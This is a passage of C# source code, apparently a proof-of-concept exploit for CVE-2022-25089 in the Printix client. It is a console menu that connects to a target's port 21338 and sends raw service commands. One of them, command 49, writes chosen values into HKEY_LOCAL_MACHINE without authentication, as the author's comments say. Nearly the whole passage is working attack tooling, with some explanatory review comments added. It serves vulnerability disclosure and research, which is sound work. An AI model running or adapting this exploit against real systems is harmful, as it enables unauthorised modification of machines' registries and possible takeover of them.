                    Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
                    Console.Write("Registry Node: ");
                    // The hive name is rewritten to "printix"; the service maps that prefix
                    // back to HKLM (inferred from the prompt text, not visible here).
                    persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
                    Console.WriteLine("Full Address Set To: " + persistentRegistryData.path);
                    //persistentRegistryData.registryData = new byte[2];
                    //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
                    Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n");
                    Console.Write("Type: ");
                    // int.Parse throws FormatException on non-numeric input; Main catches it
                    // and restarts the menu.
                    int dataF = int.Parse(Console.ReadLine());
                    Console.WriteLine("Set Data to: " + dataF);
                    Console.WriteLine("\n What value is your type? \n");
                    Console.Write("Value: ");
                    string dataB = Console.ReadLine();
                    // NOTE(review): echoes the type number again rather than the value just read.
                    Console.WriteLine("Set Data to: " + dataF);
                    byte[] loader = null;
                    List<byte> byteContainer = new List<byte>();
                    //Dword = 4
                    //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
                    // First byte of registryData is the RegistryValueKind tag; a menu choice
                    // outside 1-4 leaves `loader` null and the foreach below throws.
                    switch (dataF)
                    {
                        case (1):
                            loader = selectDataType(dataB, RegistryValueKind.String);
                            byteContainer.Add(1);
                            break;
                        case (2):
                            loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
                            byteContainer.Add(4);
                            break;
                        case (3):
                            loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
                            byteContainer.Add(11);
                            break;
                        case (4):
                            // '%' separates the strings of a multi-string value.
                            loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
                            byteContainer.Add(7);
                            break;
                    }
                    // pathHolder only counts bytes and is never read.
                    int pathHolder = 0;
                    foreach (byte bit in loader)
                    {
                        pathHolder++;
                        byteContainer.Add(bit);
                    }
                    persistentRegistryData.registryData = byteContainer.ToArray();
                    //added stuff:
                    //PersistentRegistryData data = new PersistentRegistryData();
                    //data.cmd = PersistentRegistryCmds.RestoreData;
                    //data.path = "";
                    //data.cmd
                    Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
                    data = JsonConvert.SerializeObject(persistentRegistryData);
                    break;
                //Custom cases, such as custom JSON Inputs and more.
                case (100):
                    Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
                    Console.Write("IP: ");
                    host = Console.ReadLine();
                    Console.WriteLine("Host address set to: " + host);
                    Console.WriteLine("\n What Data Should Be Sent?\n");
                    Console.Write("Data: ");
                    data = Console.ReadLine();
                    Console.WriteLine("Data set to: " + data);
                    Console.WriteLine("\n What Session Name Should Be Used? \n");
                    Console.Write("Session Name: ");
                    sessionName = Console.ReadLine();
                    Console.WriteLine("Session name set to: " + sessionName);
                    break;
            }
        }

        /// <summary>
        /// Encodes a registry value for the wire.
        /// </summary>
        /// <param name="value">string, int, long or string[] depending on <paramref name="format"/>.</param>
        /// <param name="format">Registry kind that selects the encoding.</param>
        /// <returns>
        /// UTF-8 bytes for String, little-endian 4 or 8 bytes for DWord/QWord,
        /// and for MultiString a sequence of (1-byte length, UTF-8 bytes) pairs.
        /// </returns>
        public static byte[] selectDataType(object value, RegistryValueKind format)
        {
            // Scratch buffer: String/DWord/QWord replace it, MultiString appends to it.
            byte[] array = new byte[50];
            switch (format)
            {
                case RegistryValueKind.String: //1
                    array = Encoding.UTF8.GetBytes((string)value);
                    break;
                case RegistryValueKind.DWord://4
                    // Unboxing (long)value throws InvalidCastException unless the boxed
                    // value really is a long; the only caller passes an int.
                    array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
                    break;
                case RegistryValueKind.QWord://11
                    if (value == null)
                    {
                        value = 0L;
                    }
                    array = BitConverter.GetBytes((long)value);
                    break;
                case RegistryValueKind.MultiString://7
                    {
                        if (value == null)
                        {
                            value = new string[1] { string.Empty };
                        }
                        string[] array2 = (string[])value;
                        foreach (string s in array2)
                        {
                            byte[] bytes = Encoding.UTF8.GetBytes(s);
                            // Length prefix is a single byte, so strings longer than 255 bytes are truncated in the prefix.
                            byte[] second = new byte[1] { (byte)bytes.Length };
                            // NOTE(review): unlike the other kinds this appends to the 50-byte
                            // zero-initialised scratch array instead of replacing it, so the
                            // result starts with 50 NUL bytes. Confirm against the Printix wire
                            // format before changing.
                            array = array.Concat(second).Concat(bytes).ToArray();
                        }
                        break;
                    }
            }
            return array;
        }
    }

    /// <summary>
    /// Console menu: picks a command, connects to host:21338 via CompCommClient,
    /// sends it and prints whatever the service answers. Loops forever.
    /// </summary>
    class CVESUBMISSION
    {
        static void Main(string[] args)
        {
        FORCERESTART:
            try
            {
                //Edit any registry without auth:
                //Use command 49, use the code provided on the desktop...
                //This modifies it directly, so no specific username is needed. :D
                //The command parameter, a list of commands is below.
                // Defaults below are overwritten by the menu choice; 43 is only sent
                // when the user picks an unlisted option.
                int command = 43;
                //To force the user to input variables or not.
                // Declared but never read.
                bool forceCustomInput = false;
                //The data to send, this isn't flexible and should be used only for specific examples.
                //Try to keep above 4 characters if you're just shoving things into the command.
                string data = "{\"profileID\":1,\"result\":true}";
                //The username to use.
                //This is to fulfill the requriements whilst in development mode.
                DefaultValues.CurrentSessName = "printixMDNs7914";
                //The host to connect to. DEFAULT= "localhost"
                string host = "192.168.1.29";
                // Configuration Above
            InvalidInputLabel:
                Console.Clear();
                Console.WriteLine("Please select the certificate you want to use with port 21338.");
                //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
                Console.WriteLine("Already selected, client authentication isn't needed.");
                Console.WriteLine(" /───────────────────────────\\ ");
                Console.WriteLine("\nWhat would you like to do?");
                Console.WriteLine("\n 1. Send Ping Request");
                Console.WriteLine(" 2. Send Registry Edit Request");
                Console.WriteLine(" 3. Send Custom Request");
                Console.WriteLine(" 4. Experimental Mode (Beta)\n");
                Console.Write("I choose option # ");
                try
                {
                    // ToLower() is a no-op on digits; non-numeric input throws and is
                    // caught below, which re-displays the menu.
                    switch (int.Parse(Console.ReadLine().ToLower()))
                    {
                        case (1):
                            Session session = new Session(2);
                            command = session.commandNumber;
                            host = session.host;
                            data = session.data;
                            // Random session name; sessionName from Session is not used here.
                            DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
                            break;
                        case (2):
                            Session sessionTwo = new Session(49);
                            command = sessionTwo.commandNumber;
                            host = sessionTwo.host;
                            data = sessionTwo.data;
                            DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
                            break;
                        case (3):
                            Console.WriteLine("What command number do you want to input?");
                            command = int.Parse(Console.ReadLine().ToString());
                            Console.WriteLine("What IP would you like to use? (Default = localhost)");
                            host = Console.ReadLine();
                            Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
                            data = Console.ReadLine();
                            Console.WriteLine("What session name do you want to use? ");
                            DefaultValues.CurrentSessName = Console.ReadLine();
                            break;
                        case (4):
                            Console.WriteLine("Not yet implemented.");
                            break;
                    }
                }
                catch (Exception e)
                {
                    Console.WriteLine("Invalid Input!");
                    goto InvalidInputLabel;
                }
                Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
                Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
                CompCommClient client = new CompCommClient();
                byte[] responseStorage = new byte[25555];
                int responseCMD = 0;
                // Connect(host, port, retries?, timeoutMs?) — argument meaning assumed from
                // the values; CompCommClient is defined in the Printix assembly.
                client.Connect(host, 21338, 3, 10000);
                client.SendMessage(command, Encoding.UTF8.GetBytes(data));
                // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
                // Check for output multiple times, and see if this is conclusive.
                //client.SendMessage(51, Encoding.ASCII.GetBytes(data));
                // Reader thread: polls client.Read five times, ~100 ms apart, printing the
                // printable characters of each buffer, then disconnects.
                new Thread(() =>
                {
                    //Thread.Sleep(4000);
                    if (client.Connected())
                    {
                        int cam = 0;
                        // 4 itterations of loops, may be lifted in the future.
                        while (cam < 5)
                        {
                            //Reads the datastream and keeps returning results.
                            //Thread.Sleep(100);
                            try
                            {
                                try
                                {
                                    // First pass prints the still-empty 25555-byte buffer (all NUL,
                                    // filtered out below); later passes print the previous Read.
                                    if (responseStorage?.Any() == true)
                                    {
                                        //List<byte> byo1 = responseStorage.ToList();
                                        // Buffers containing "Caption" are skipped entirely.
                                        if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
                                        {
                                            foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
                                            {
                                                // Keep letters, digits and punctuation only.
                                                if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
                                                {
                                                    Console.Write(cam2);
                                                }
                                            }
                                        }
                                        else
                                        {
                                        }
                                    }
                                }
                                catch (Exception e)
                                {
                                    Debug.WriteLine(e);
                                }
                                client.Read(out responseCMD, out responseStorage);
                            }
                            catch (Exception e)
                            {
                                // A failed Read ends polling early.
                                goto ReadException;
                            }
                            Thread.Sleep(100);
                            cam++;
                            //Console.WriteLine(cam);
                        }
                    }
                    else
                    {
                        Console.WriteLine("[WARNING]: Client is Disconnected!");
                    }
                ReadException:
                    try
                    {
                        Console.WriteLine("Command Variable Response: " + responseCMD);
                        Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
                        client.disConnect();
                    }
                    catch (Exception e)
                    {
                        // Message text does not match the ~0.5 s the loop above actually waits.
                        Console.WriteLine("After 4.2 Seconds, there has been no response!");
                        client.disConnect();
                    }
                }).Start();
                // Printed immediately, before the reader thread has received anything.
                Console.WriteLine(responseCMD);
                Console.ReadLine();
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
                Console.ReadLine();
                //Environment.Exit(e.HResult);
            }
            goto FORCERESTART;
        }
    }
}